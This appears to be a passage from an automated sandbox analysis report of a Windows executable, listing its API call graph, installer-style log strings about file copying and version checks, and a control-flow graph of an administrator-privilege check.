40357c 53994->53999 53995 4034e0 4 API calls 53995->53998 53997 40357c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53997->53998 53998->53991 53998->53994 53998->53995 53998->53997 54014 42cb8c 6 API calls 54013->54014 54015 42ccba 54014->54015 54016 42ccc2 GetFileAttributesA 54015->54016 54017 403400 4 API calls 54016->54017 54018 42ccdf 54017->54018 54018->53533 54018->53795 54019->53549 54022 4699bb 54020->54022 54021 469e33 54023 469e4e 54021->54023 54024 469e7f 54021->54024 54022->54021 54025 469a76 54022->54025 54029 403494 4 API calls 54022->54029 54028 403494 4 API calls 54023->54028 54026 403494 4 API calls 54024->54026 54027 469a97 54025->54027 54031 469ad8 54025->54031 54030 469e8d 54026->54030 54032 403494 4 API calls 54027->54032 54033 469e5c 54028->54033 54034 4699fa 54029->54034 54127 46889c 12 API calls 54030->54127 54035 403400 4 API calls 54031->54035 54037 469aa5 54032->54037 54126 46889c 12 API calls 54033->54126 54039 414af8 4 API calls 54034->54039 54040 469ad6 54035->54040 54041 414af8 4 API calls 54037->54041 54043 469a1b 54039->54043 54063 469bbc 54040->54063 54106 468fa8 54040->54106 54045 469ac6 54041->54045 54042 469e6a 54044 403400 4 API calls 54042->54044 54046 403634 4 API calls 54043->54046 54048 469eb0 54044->54048 54050 403634 4 API calls 54045->54050 54051 469a2b 54046->54051 54055 403400 4 API calls 54048->54055 54049 469c44 54053 403400 4 API calls 54049->54053 54050->54040 54052 414af8 4 API calls 54051->54052 54056 469a3f 54052->54056 54057 469c42 54053->54057 54054 469af8 54058 469b36 54054->54058 54059 469afe 54054->54059 54060 469eb8 54055->54060 54056->54025 54065 414af8 4 API calls 54056->54065 54121 4693e4 43 API calls 54057->54121 54064 403400 4 API calls 54058->54064 54061 403494 4 API calls 54059->54061 54062 403420 4 API calls 54060->54062 54066 469b0c 54061->54066 54067 469ec5 54062->54067 54063->54049 54068 469c03 54063->54068 54069 469b34 54064->54069 54070 469a66 54065->54070 54112 47ad88 54066->54112 54067->53555 54073 403494 4 API calls 54068->54073 54115 46929c 54069->54115 54074 403634 4 API calls 54070->54074 54077 469c11 54073->54077 54074->54025 54075 469c6d 54084 469cce 54075->54084 54085 469c78 54075->54085 54076 469b24 54079 403634 4 API calls 54076->54079 54080 414af8 4 API calls 54077->54080 54079->54069 54081 469c32 54080->54081 54083 403634 4 API calls 54081->54083 54082 469b5d 54088 469bbe 54082->54088 54089 469b68 54082->54089 54083->54057 54086 403400 4 API calls 54084->54086 54087 403494 4 API calls 54085->54087 54090 469cd6 54086->54090 54094 469c86 54087->54094 54091 403400 4 API calls 54088->54091 54092 403494 4 API calls 54089->54092 54093 469ccc 54090->54093 54104 469d7f 54090->54104 54091->54063 54097 469b76 54092->54097 54093->54090 54122 4930f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54093->54122 54094->54090 54094->54093 54099 403634 4 API calls 54094->54099 54096 469cf9 54096->54104 54123 49339c 18 API calls 54096->54123 54097->54063 54100 403634 4 API calls 54097->54100 54099->54094 54100->54097 54102 469e20 54125 429154 SendMessageA SendMessageA 54102->54125 54124 429104 SendMessageA 54104->54124 54105->53557 54128 42a050 SendMessageA 54106->54128 54108 468fb7 54109 468fd7 54108->54109 54129 42a050 SendMessageA 54108->54129 54109->54054 54111 468fc7 54111->54054 54130 47ada8 54112->54130 54119 4692c9 54115->54119 54116 46932b 54117 403400 4 API calls 54116->54117 54118 469340 54117->54118 54118->54082 54119->54116 54454 469220 43 API calls 54119->54454 54121->54075 54122->54096 54123->54104 54124->54102 54125->54021 54126->54042 54127->54042 54128->54108 54129->54111 54131 403494 4 API calls 54130->54131 54135 47addb 54131->54135 54132 47aee0 54133 403420 4 API calls 54132->54133 54134 47ada3 54133->54134 54134->54076 54135->54132 54137 403778 4 API calls 54135->54137 54141 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54135->54141 54142 479cfc 54135->54142 54374 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54135->54374 54375 403800 54135->54375 54379 42c948 CharPrevA 54135->54379 54137->54135 54141->54135 54143 479d4e 54142->54143 54144 479d2c 54142->54144 54145 479d6e 54143->54145 54146 479d5c 54143->54146 54144->54143 54384 478c2c 19 API calls 54144->54384 54149 479dd1 54145->54149 54150 479d7c 54145->54150 54147 403494 4 API calls 54146->54147 54201 479d69 54147->54201 54157 479df2 54149->54157 54158 479ddf 54149->54158 54151 479d85 54150->54151 54152 479dab 54150->54152 54154 479d98 54151->54154 54385 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54151->54385 54155 479dbe 54152->54155 54386 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54152->54386 54153 403400 4 API calls 54156 47a67c 54153->54156 54160 403494 4 API calls 54154->54160 54162 403494 4 API calls 54155->54162 54163 403400 4 API calls 54156->54163 54166 479e13 54157->54166 54167 479e00 54157->54167 54164 403494 4 API calls 54158->54164 54160->54201 54162->54201 54165 47a684 54163->54165 54164->54201 54165->54135 54169 479e63 54166->54169 54170 479e21 54166->54170 54168 403494 4 API calls 54167->54168 54168->54201 54177 479e84 54169->54177 54178 479e71 54169->54178 54171 479e3d 54170->54171 54172 479e2a 54170->54172 54173 479e50 54171->54173 54387 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54171->54387 54174 403494 4 API calls 54172->54174 54176 403494 4 API calls 54173->54176 54174->54201 54176->54201 54180 479ea5 54177->54180 54181 479e92 54177->54181 54179 403494 4 API calls 54178->54179 54179->54201 54183 479ec6 54180->54183 54184 479eb3 54180->54184 54182 403494 4 API calls 54181->54182 54182->54201 54186 479ee7 54183->54186 54187 479ed4 54183->54187 54185 403494 4 API calls 54184->54185 54185->54201 54189 479ef5 54186->54189 54190 479f24 54186->54190 54188 403494 4 API calls 54187->54188 54188->54201 54191 479f11 54189->54191 54192 479efe 54189->54192 54195 479f32 54190->54195 54199 479f61 54190->54199 54194 403494 4 API calls 54191->54194 54193 403494 4 API calls 54192->54193 54193->54201 54194->54201 54196 479f4e 54195->54196 54197 479f3b 54195->54197 54198 403494 4 API calls 54196->54198 54200 403494 4 API calls 54197->54200 54198->54201 54202 479f82 54199->54202 54203 479f6f 54199->54203 54200->54201 54201->54153 54205 479fa3 54202->54205 54206 479f90 54202->54206 54204 403494 4 API calls 54203->54204 54204->54201 54208 479fb1 54205->54208 54209 479fdc 54205->54209 54207 403494 4 API calls 54206->54207 54207->54201 54374->54135 54376 403804 54375->54376 54378 40382f 54375->54378 54377 4038a4 4 API calls 54376->54377 54377->54378 54378->54135 54379->54135 54384->54144 54385->54154 54386->54155 54387->54173 54454->54119 54456 47c592 54455->54456 54460 47c5c8 54455->54460 54498 455228 54456->54498 54457 403420 4 API calls 54458 47c6dc 54457->54458 54458->53563 54460->54457 54461 47c6a5 54461->53563 54462 47c5bc 54462->54460 54462->54461 54465 47ad88 43 API calls 54462->54465 54470 47c651 54462->54470 54505 478218 54462->54505 54516 47830c 54462->54516 54520 47c12c 31 API calls 54462->54520 54465->54462 54466 47ad88 43 API calls 54466->54470 54468 42c8f8 5 API calls 54468->54470 54469 42c920 5 API calls 54469->54470 54470->54462 54470->54466 54470->54468 54470->54469 54472 47c692 54470->54472 54521 47c274 58 API calls 54470->54521 54472->54460 54583 465e28 54473->54583 54476->53572 54478 42f3e0 54477->54478 54479 42f403 GetActiveWindow GetFocus 54478->54479 54480 41eeb4 2 API calls 54479->54480 54481 42f41a 54480->54481 54482 42f437 54481->54482 54483 42f427 RegisterClassA 54481->54483 54484 42f4c6 SetFocus 54482->54484 54485 42f445 CreateWindowExA 54482->54485 54483->54482 54487 403400 4 API calls 54484->54487 54485->54484 54486 42f478 54485->54486 54614 42428c 54486->54614 54489 42f4e2 54487->54489 54493 49339c 18 API calls 54489->54493 54490 42f4a0 54491 42f4a8 CreateWindowExA 54490->54491 54491->54484 54492 42f4be ShowWindow 54491->54492 54492->54484 54493->53594 54620 44ad68 54494->54620 54499 455239 54498->54499 54500 455246 54499->54500 54501 45523d 54499->54501 54530 45500c 29 API calls 54500->54530 54522 454f2c 54501->54522 54504 455243 54504->54462 54506 47822e 54505->54506 54507 47822a 54505->54507 54508 403450 4 API calls 54506->54508 54507->54462 54509 47823b 54508->54509 54510 478241 54509->54510 54511 47825b 54509->54511 54559 4780d8 54510->54559 54512 4780d8 19 API calls 54511->54512 54514 478257 54512->54514 54515 403400 4 API calls 54514->54515 54515->54507 54517 478318 54516->54517 54518 478333 54517->54518 54582 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54517->54582 54518->54462 54520->54462 54521->54470 54531 42dd44 54522->54531 54524 454f49 54525 454f97 54524->54525 54534 454e60 54524->54534 54525->54504 54528 454e60 6 API calls 54529 454f78 RegCloseKey 54528->54529 54529->54504 54530->54504 54532 42dd55 RegOpenKeyExA 54531->54532 54533 42dd4f 54531->54533 54532->54524 54533->54532 54539 42dc80 54534->54539 54536 403420 4 API calls 54537 454f12 54536->54537 54537->54528 54538 454e88 54538->54536 54542 42db28 54539->54542 54543 42db4e RegQueryValueExA 54542->54543 54549 42db71 54543->54549 54558 42db93 54543->54558 54544 403400 4 API calls 54546 42dc5f 54544->54546 54545 42db8b 54547 403400 4 API calls 54545->54547 54546->54538 54547->54558 54548 4034e0 4 API calls 54548->54549 54549->54545 54549->54548 54550 403744 4 API calls 54549->54550 54549->54558 54551 42dbc8 RegQueryValueExA 54550->54551 54551->54543 54552 42dbe4 54551->54552 54553 4038a4 4 API calls 54552->54553 54552->54558 54554 42dc26 54553->54554 54555 42dc38 54554->54555 54557 403744 4 API calls 54554->54557 54556 403450 4 API calls 54555->54556 54556->54558 54557->54555 54558->54544 54560 4780f3 54559->54560 54563 4781b2 54560->54563 54564 478124 54560->54564 54577 477f8c 19 API calls 54560->54577 54562 478149 54567 47816a 54562->54567 54579 477f8c 19 API calls 54562->54579 54563->54514 54564->54562 54578 477f8c 19 API calls 54564->54578 54567->54563 54568 4781aa 54567->54568 54580 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54567->54580 54571 477e10 54568->54571 54572 477e4b 54571->54572 54573 403450 4 API calls 54572->54573 54574 477e70 54573->54574 54581 476500 19 API calls 54574->54581 54576 477eb1 54576->54563 54577->54564 54578->54562 54579->54567 54580->54568 54581->54576 54582->54518 54584 403494 4 API calls 54583->54584 54585 465e56 54584->54585 54600 42daf0 54585->54600 54588 42daf0 5 API calls 54589 465e7a 54588->54589 54590 465d14 19 API calls 54589->54590 54591 465e84 54590->54591 54592 42daf0 5 API calls 54591->54592 54593 465e93 54592->54593 54603 465d8c 54593->54603 54596 42daf0 5 API calls 54597 465eac 54596->54597 54598 403400 4 API calls 54597->54598 54599 465ec1 54598->54599 54599->53567 54607 42da38 54600->54607 54604 465dac 54603->54604 54605 4078fc 19 API calls 54604->54605 54606 465df6 54605->54606 54606->54596 54608 42dae3 54607->54608 54609 42da58 54607->54609 54608->54588 54609->54608 54610 4037b8 4 API calls 54609->54610 54612 403800 4 API calls 54609->54612 54613 42c454 IsDBCSLeadByte 54609->54613 54610->54609 54612->54609 54613->54609 54615 4242be 54614->54615 54616 42429e GetWindowTextA 54614->54616 54618 403494 4 API calls 54615->54618 54617 4034e0 4 API calls 54616->54617 54619 4242bc 54617->54619 54618->54619 54619->54490 54623 44abe0 54620->54623 54624 44ac13 54623->54624 54625 414af8 4 API calls 54624->54625 54626 44ac26 54625->54626 54627 44ac53 73A0A570 54626->54627 54628 40357c 4 API calls 54626->54628 54634 41a1f8 54627->54634 54628->54627 54631 44ac84 54642 44a914 54631->54642 54635 41a223 54634->54635 54636 41a2bf 54634->54636 54653 403520 54635->54653 54637 403400 4 API calls 54636->54637 54638 41a2d7 SelectObject 54637->54638 54638->54631 54641 41a27b 54654 4034e0 4 API calls 54653->54654 54655 40352a 54654->54655 54655->54641 54658 4649ff 54656->54658 54657 464ada 54667 4667a4 54657->54667 54658->54657 54662 464a4f 54658->54662 54680 421a2c 54658->54680 54659 464a92 54659->54657 54686 4185c8 7 API calls 54659->54686 54662->54659 54663 464a94 54662->54663 54664 464a89 54662->54664 54665 421a2c 7 API calls 54663->54665 54666 421a2c 7 API calls 54664->54666 54665->54659 54666->54659 54668 4667d4 54667->54668 54669 4667b5 54667->54669 54668->53620 54670 414b28 4 API calls 54669->54670 54671 4667c3 54670->54671 54672 414b28 4 API calls 54671->54672 54672->54668 54674 469f3d 54673->54674 54675 421a2c 7 API calls 54674->54675 54676 469f96 54675->54676 54676->53646 54678 466274 18 API calls 54676->54678 54677->53623 54678->53646 54679->53647 54681 421a84 54680->54681 54684 421a3a 54680->54684 54681->54662 54682 421a69 54682->54681 54695 421d38 SetFocus GetFocus 54682->54695 54684->54682 54687 408cc4 54684->54687 54686->54657 54688 408cd0 54687->54688 54696 406df4 LoadStringA 54688->54696 54691 403450 4 API calls 54692 408d01 54691->54692 54693 403400 4 API calls 54692->54693 54694 408d16 54693->54694 54694->54682 54695->54681 54697 4034e0 4 API calls 54696->54697 54698 406e21 54697->54698 54698->54691 54700 46b7e1 54699->54700 54701 46b82e 54700->54701 54702 414af8 4 API calls 54700->54702 54703 403420 4 API calls 54701->54703 54704 46b7f7 54702->54704 54706 46b8d8 54703->54706 54887 466038 6 API calls 54704->54887 54706->53661 54880 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54706->54880 54707 46b7ff 54708 414b28 4 API calls 54707->54708 54709 46b80d 54708->54709 54710 46b81a 54709->54710 54712 46b833 54709->54712 54888 47d508 42 API calls 54710->54888 54713 46b84b 54712->54713 54715 46611c CharNextA 54712->54715 54889 47d508 42 API calls 54713->54889 54716 46b847 54715->54716 54716->54713 54717 46b861 54716->54717 54718 46b867 54717->54718 54719 46b87d 54717->54719 54890 47d508 42 API calls 54718->54890 54721 42c968 CharNextA 54719->54721 54722 46b88a 54721->54722 54722->54701 54891 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54722->54891 54724 46b8a1 54725 450ab8 4 API calls 54724->54725 54726 46b8ae 54725->54726 54892 47d508 42 API calls 54726->54892 54729 480ab9 54728->54729 54730 480a8b 54728->54730 54732 4749c8 54729->54732 54893 49314c 18 API calls 54730->54893 54894 456f08 54732->54894 54735 4072b0 SetCurrentDirectoryA 54736 474a1e 54735->54736 54915 46d33c 54736->54915 54881->53669 54887->54707 54888->54701 54889->54701 54890->54701 54891->54724 54892->54701 54893->54729 54895 456f34 54894->54895 54896 45703c 54894->54896 55435 456c04 GetSystemTimeAsFileTime FileTimeToSystemTime 54895->55435 54897 45708d 54896->54897 55439 456774 6 API calls 54896->55439 54900 403400 4 API calls 54897->54900 54902 4570a2 54900->54902 54901 456f3c 54903 4078fc 19 API calls 54901->54903 54902->54735 54904 456fad 54903->54904 55436 456ef8 20 API calls 54904->55436 54906 403778 4 API calls 54910 456fb5 54906->54910 54908 457003 54910->54906 54910->54908 54911 456ef8 20 API calls 54910->54911 54911->54910 54916 46d3af 54915->54916 54918 46d359 54915->54918 54918->54916 55435->54901 55436->54910 55439->54897 56638 431740 56599->56638 56601 43d246 56602 403400 4 API calls 56601->56602 56603 43d2ca 56602->56603 56603->53727 56603->53728 56605 43142a 56604->56605 56606 402648 4 API calls 56605->56606 56607 43145a 56606->56607 56608 492c58 56607->56608 56609 492d2d 56608->56609 56613 492c72 56608->56613 56615 492d70 56609->56615 56610 4335c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56610->56613 56613->56609 56613->56610 56614 403450 4 API calls 56613->56614 56643 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56613->56643 56644 4314f4 56613->56644 56614->56613 56616 492d8c 56615->56616 56652 4335c0 56616->56652 56618 492d91 56619 4314f4 4 API calls 56618->56619 56620 492d9c 56619->56620 56621 43cde8 56620->56621 56622 43ce15 56621->56622 56627 43ce07 56621->56627 56622->53738 56623 43ce91 56631 43cf4b 56623->56631 56655 4468d8 56623->56655 56625 43cedc 56661 43d5a4 56625->56661 56627->56622 56627->56623 56628 4468d8 4 API calls 56627->56628 56628->56627 56629 43d151 56629->56622 56681 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56629->56681 56631->56629 56632 43d132 56631->56632 56679 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56631->56679 56680 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56632->56680 56635->53740 56636->53742 56637->53729 56639 403494 4 API calls 56638->56639 56641 43174f 56639->56641 56640 431779 56640->56601 56641->56640 56642 403744 4 API calls 56641->56642 56642->56641 56643->56613 56645 431502 56644->56645 56646 431514 56644->56646 56650 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56645->56650 56648 431536 56646->56648 56651 431494 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56646->56651 56648->56613 56650->56646 56651->56648 56653 402648 4 API calls 56652->56653 56654 4335cf 56653->56654 56654->56618 56656 4468f7 56655->56656 56657 4468fe 56655->56657 56682 446684 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56656->56682 56659 4314f4 4 API calls 56657->56659 56660 44690e 56659->56660 56660->56625 56662 43d5c0 56661->56662 56675 43d5ed 56661->56675 56663 402660 4 API calls 56662->56663 56662->56675 56663->56662 56664 43d622 56664->56631 56666 43f6f9 56666->56664 56692 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56666->56692 56668 43c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56668->56675 56672 43356c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56672->56675 56673 435ea4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56673->56675 56674 43336c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56674->56675 56675->56664 56675->56666 56675->56668 56675->56672 56675->56673 56675->56674 56676 431494 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56675->56676 56677 446684 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56675->56677 56678 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56675->56678 56683 438f34 56675->56683 56689 4366a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56675->56689 56690 43d49c 18 API calls 56675->56690 56691 433588 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56675->56691 56676->56675 56677->56675 56678->56675 56679->56631 56680->56629 56681->56629 56682->56657 56684 438f3d 56683->56684 56685 403400 4 API calls 56684->56685 56689->56675 56690->56675 56691->56675 56692->56666 56694 47efd8 56695 47efe1 56694->56695 56698 47f00c 56694->56698 56697 47effe 56695->56697 56695->56698 56696 47f04b 56699 47f05e 56696->56699 56700 47f06b 56696->56700 57103 4756fc 188 API calls 56697->57103 56698->56696 57105 47d9dc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56698->57105 56703 47f062 56699->56703 56704 47f0a0 56699->56704 56706 47f085 56700->56706 56707 47f074 56700->56707 56709 47f066 56703->56709 56715 47f0e3 56703->56715 56716 47f0fe 56703->56716 56712 47f0c4 56704->56712 56713 47f0a9 56704->56713 56705 47f003 56705->56698 57104 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56705->57104 57108 47dbe8 42 API calls 56706->57108 57107 47db78 42 API calls 56707->57107 56708 47f03e 57106 47db78 42 API calls 56708->57106 56722 47f127 56709->56722 56723 47f145 56709->56723 57110 47dbe8 42 API calls 56712->57110 57109 47dbe8 42 API calls 56713->57109 57111 47dbe8 42 API calls 56715->57111 57112 47dbe8 42 API calls 56716->57112 56725 47f13c 56722->56725 57113 47db78 42 API calls 56722->57113 57115 47d874 24 API calls 56723->57115 57114 47d874 24 API calls 56725->57114 56726 47f143 56729 47f155 56726->56729 56730 47f15b 56726->56730 56731 47f159 56729->56731 56828 47db54 56729->56828 56730->56731 56732 47db54 42 API calls 56730->56732 56833 47b154 56731->56833 56732->56731 57126 47d508 42 API calls 56828->57126 56830 47db6f 57127 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56830->57127 56834 42d864 GetWindowsDirectoryA 56833->56834 56835 47b172 56834->56835 56836 403450 4 API calls 56835->56836 56837 47b17f 56836->56837 56838 42d890 GetSystemDirectoryA 56837->56838 56839 47b187 56838->56839 56840 403450 4 API calls 56839->56840 56841 47b194 56840->56841 56842 42d8bc 6 API calls 56841->56842 56843 47b19c 56842->56843 56844 403450 4 API calls 56843->56844 56845 47b1a9 56844->56845 56846 47b1b2 56845->56846 56847 47b1ce 56845->56847 57148 42d1d4 56846->57148 56848 403400 4 API calls 56847->56848 56850 47b1cc 56848->56850 56852 47b213 56850->56852 56854 42c898 5 API calls 56850->56854 57128 47afdc 56852->57128 56853 403450 4 API calls 56853->56850 56856 47b1ee 56854->56856 56858 403450 4 API calls 56856->56858 56860 47b1fb 56858->56860 56859 403450 4 API calls 56861 47b22f 56859->56861 56860->56852 56865 403450 4 API calls 56860->56865 56862 47b24d 56861->56862 56863 4035c0 4 API calls 56861->56863 56864 47afdc 8 API calls 56862->56864 56863->56862 56866 47b25c 56864->56866 56865->56852 56867 403450 4 API calls 56866->56867 56868 47b269 56867->56868 56869 47b291 56868->56869 56870 42c40c 5 API calls 56868->56870 56871 47b2f8 56869->56871 56875 47afdc 8 API calls 56869->56875 56872 47b27f 56870->56872 56873 47b322 56871->56873 56874 47b301 56871->56874 56877 4035c0 4 API calls 56872->56877 56877->56869 57103->56705 57105->56708 57106->56696 57107->56709 57108->56709 57109->56709 57110->56709 57111->56709 57112->56709 57113->56725 57114->56726 57115->56726 57126->56830 57129 42dd44 RegOpenKeyExA 57128->57129 57130 47b002 57129->57130 57131 47b006 57130->57131 57132 47b028 57130->57132 57133 42dc74 6 API calls 57131->57133 57134 403400 4 API calls 57132->57134 57135 47b012 57133->57135 57136 47b02f 57134->57136 57137 47b01d RegCloseKey 57135->57137 57138 403400 4 API calls 57135->57138 57136->56859 57137->57136 57138->57137 57149 4038a4 4 API calls 57148->57149 57151 42d1e7 57149->57151 57150 42d1fe GetEnvironmentVariableA 57150->57151 57152 42d20a 57150->57152 57151->57150 57155 42d211 57151->57155 57158 42daf8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57151->57158 57154 403400 4 API calls 57152->57154 57154->57155 57155->56853 57158->57151
                                                                          Strings
                                                                          • Incrementing shared file count (64-bit)., xrefs: 00470549
                                                                          • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FCA8
                                                                          • Failed to strip read-only attribute., xrefs: 0046FEB7
                                                                          • Same version. Skipping., xrefs: 0046FCC9
                                                                          • , xrefs: 0046FBB3, 0046FD84, 0046FE02
                                                                          • Will register the file (a DLL/OCX) later., xrefs: 004704DC
                                                                          • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FDD0
                                                                          • Will register the file (a type library) later., xrefs: 004704D0
                                                                          • Version of existing file: (none), xrefs: 0046FCDE
                                                                          • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FCB4
                                                                          • Time stamp of existing file: (failed to read), xrefs: 0046FA1B
                                                                          • Stripped read-only attribute., xrefs: 0046FEAB
                                                                          • Dest filename: %s, xrefs: 0046F878
                                                                          • Installing into GAC, xrefs: 004706D1
                                                                          • Existing file has a later time stamp. Skipping., xrefs: 0046FDB3
                                                                          • Version of existing file: %u.%u.%u.%u, xrefs: 0046FB60
                                                                          • Non-default bitness: 64-bit, xrefs: 0046F893
                                                                          • Time stamp of our file: (failed to read), xrefs: 0046F98B
                                                                          • InUn, xrefs: 00470129
                                                                          • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FC99
                                                                          • Version of our file: (none), xrefs: 0046FAE0
                                                                          • Dest file is protected by Windows File Protection., xrefs: 0046F8D1
                                                                          • Time stamp of our file: %s, xrefs: 0046F97F
                                                                          • Couldn't read time stamp. Skipping., xrefs: 0046FD19
                                                                          • User opted not to overwrite the existing file. Skipping., xrefs: 0046FE31
                                                                          • Uninstaller requires administrator: %s, xrefs: 00470159
                                                                          • Installing the file., xrefs: 0046FEED
                                                                          • @, xrefs: 0046F794
                                                                          • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FE7A
                                                                          • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046FEDE
                                                                          • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046F9B2
                                                                          • Same time stamp. Skipping., xrefs: 0046FD39
                                                                          • Time stamp of existing file: %s, xrefs: 0046FA0F
                                                                          • .tmp, xrefs: 0046FF9B
                                                                          • Dest file exists., xrefs: 0046F99F
                                                                          • Version of our file: %u.%u.%u.%u, xrefs: 0046FAD4
                                                                          • -- File entry --, xrefs: 0046F6DF
                                                                          • Non-default bitness: 32-bit, xrefs: 0046F89F
                                                                          • Existing file is a newer version. Skipping., xrefs: 0046FBE6
                                                                          • Incrementing shared file count (32-bit)., xrefs: 00470562
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                          • API String ID: 0-4021121268
                                                                          • Opcode ID: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                          • Instruction ID: cb3b5b092a3a8f8c122efd66c5c5c6ee12dad63ca724b3077347a87130114cb0
                                                                          • Opcode Fuzzy Hash: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                          • Instruction Fuzzy Hash: 9B928234A04288DFCB11DFA5D445BDDBBB1AF05304F5480ABE884BB392D7789E49CB5A

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1530 42dfc4-42dfd5 1531 42dfe0-42e005 AllocateAndInitializeSid 1530->1531 1532 42dfd7-42dfdb 1530->1532 1533 42e1af-42e1b7 1531->1533 1534 42e00b-42e028 GetVersion 1531->1534 1532->1533 1535 42e041-42e043 1534->1535 1536 42e02a-42e03f GetModuleHandleA GetProcAddress 1534->1536 1537 42e045-42e053 CheckTokenMembership 1535->1537 1538 42e06a-42e084 GetCurrentThread OpenThreadToken 1535->1538 1536->1535 1539 42e191-42e1a7 FreeSid 1537->1539 1540 42e059-42e065 1537->1540 1541 42e086-42e090 GetLastError 1538->1541 1542 42e0bb-42e0e3 GetTokenInformation 1538->1542 1540->1539 1543 42e092-42e097 call 4031bc 1541->1543 1544 42e09c-42e0af GetCurrentProcess OpenProcessToken 1541->1544 1545 42e0e5-42e0ed GetLastError 1542->1545 1546 42e0fe-42e122 call 402648 GetTokenInformation 1542->1546 1543->1533 1544->1542 1549 42e0b1-42e0b6 call 4031bc 1544->1549 1545->1546 1550 42e0ef-42e0f9 call 4031bc * 2 1545->1550 1556 42e130-42e138 1546->1556 1557 42e124-42e12e call 4031bc * 2 1546->1557 1549->1533 1550->1533 1561 42e13a-42e13b 1556->1561 1562 42e16b-42e189 call 402660 CloseHandle 1556->1562 1557->1533 1566 42e13d-42e150 EqualSid 1561->1566 1562->1539 1569 42e152-42e15f 1566->1569 1570 42e167-42e169 1566->1570 1569->1570 1572 42e161-42e165 1569->1572 1570->1562 1570->1566 1572->1562
                                                                          APIs
                                                                          • AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
                                                                          • GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
